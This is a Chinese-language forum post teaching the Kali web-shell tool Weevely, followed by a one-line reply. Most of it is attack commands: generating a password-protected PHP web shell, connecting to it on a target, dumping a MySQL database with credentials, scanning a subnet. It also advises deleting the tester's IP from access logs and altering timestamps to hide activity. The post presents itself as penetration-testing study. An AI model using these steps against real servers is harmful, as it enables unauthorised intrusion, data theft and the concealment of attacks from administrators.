admin 发表于 2021-7-5 11:10:59

Kali Weevely使用学习

> `Weevely` 是一个专门为 Web 渗透测试设计的 Web shell,由于是用 python 语言编写的工具,因此支持跨平台可以
> 任何有 python 环境的系统上使用。和 Windows 系统中一款类似的工具(中国菜刀)一样。

!(data/attachment/forum/202107/05/111047qnvwbq6tfj00awt1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "weevely.png")

### 安装更新

在 kali 中已经默认安装了 weevely 其他类似系统安装执行下面命令即可。

```
apt-get install weevely -y
```

### 基础用法

#### 生成 Web shell

格式如下:
`weevely generate <shell密码> <生成目录>`
**示例:**

```
weevely generate 8888 /root/88.php
```

![生成 web shell](https://blog.bbskali.cn/usr/uploads/2021/07/1445160768.png)

#### 连接 Web shell

我们需将生成的 Web shell 上传到目标服务器。这里不在详解,需要的伙伴可以阅读博客中类似的文章。
格式如下:
`weevely <URL> <password> `
**示例:**

```
weevely http://192.168.1.2/88.php 8888
```

![连接 shell](https://blog.bbskali.cn/usr/uploads/2021/07/3402775101.png)

#### 查看系统信息

所需命令 `system_info`
![查看系统信息](https://blog.bbskali.cn/usr/uploads/2021/07/3818679302.png)

#### 枚举用户文件

枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过 `:audit_ filesystem `,来查看都支
持搜索哪些类型的用户文件。

#### 查看 PHP 配置文件

所需命令 `audit_phpconf`
![](https://blog.bbskali.cn/usr/uploads/2021/07/2105933128.png)

### 高级用法

#### 系统提权

连接数据库 `sql_console`

```
sql_console -u root -p 12345678
```

![连接数据库](https://blog.bbskali.cn/usr/uploads/2021/07/692132316.jpg)

#### 对数据库进行脱裤

所需命令:`sql_dump`

```
sql_dump -dbms mysql tianyuan root 12345678
```

![](https://blog.bbskali.cn/usr/uploads/2021/07/2393043812.jpg)

#### 文件操作

当获取到目标系统的 weevely shell 后,我们通过 help 可以查看文件相关的模块。通过这些文件操作模块,可以
对目标服务器进行文件的打包、上传、 获取、删除、在线修改、复制,还可以通过 HTTPfs 挂在远程文件系统。通
过这些操作,不仅可以修改目标服务器上的源代码,还可以清除或修改我们的操作日志。比如将 access log 中有关
测试机 IP 地址的信息删除,或者算改日志中的时间戳等等。
![](https://blog.bbskali.cn/usr/uploads/2021/07/2762515633.jpg)

#### 子网扫描

所需命令:`net_scan`
**示例:**

```
net_scan 192.168.1.1/24 80,3306 -print
```

![](https://blog.bbskali.cn/usr/uploads/2021/07/4194917542.png)
更多好玩,请看 `help` 命令。

priess1314 发表于 2021-7-6 14:47:24

kali下的中国菜刀!
页: [1]
查看完整版本: Kali Weevely使用学习